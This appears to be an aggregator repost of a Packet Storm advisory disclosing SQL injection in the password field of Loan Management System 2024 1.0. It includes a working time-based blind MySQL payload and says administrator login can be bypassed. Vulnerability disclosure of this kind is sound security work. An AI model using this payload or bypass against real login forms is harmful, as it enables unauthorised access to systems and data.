Headline

Copyright Loan Management System 2024 1.0 SQL Injection

Copyright Loan Management System 2024 version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

10 months ago

Packet Storm

Open in Source

#sql #vulnerability #web #git #php #auth

## Title: Copyright © Loan Management System 2024-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 01/12/2024## Vendor: https://twitter.com/razormist## Software: https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `password` parameter is vulnerable to SQL injection attacks. Thepayload ' was submitted in the password parameter, and a databaseerror message was returned. Also, the attacker can bypass the loginform and log in to the system as an administrator using thisvulnerability SQLi bypass authentication.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: password (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=aeoZNyVE&password=r8D!y8e!I8' AND (SELECT 8282FROM (SELECT(SLEEP(7)))jrPA)# PgMx&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/razormist/2024/Loan-Management-System-2024-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/copyright-loan-management-system-2024.html)## Time spend:00:35:00

Packet Storm: Latest News

Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download

17 hours ago

Packet Storm

TX Text Control .NET Server For ASP.NET Arbitrary File Read / Write

17 hours ago

Packet Storm

GravCMS 1.10.7 Arbitrary YAML Write / Update

18 hours ago

Packet Storm

PHP-CGI Argument Injection Remote Code Execution

18 hours ago

Packet Storm

PHP-CGI Argument Injection Susceptibility Scanner

18 hours ago

Packet Storm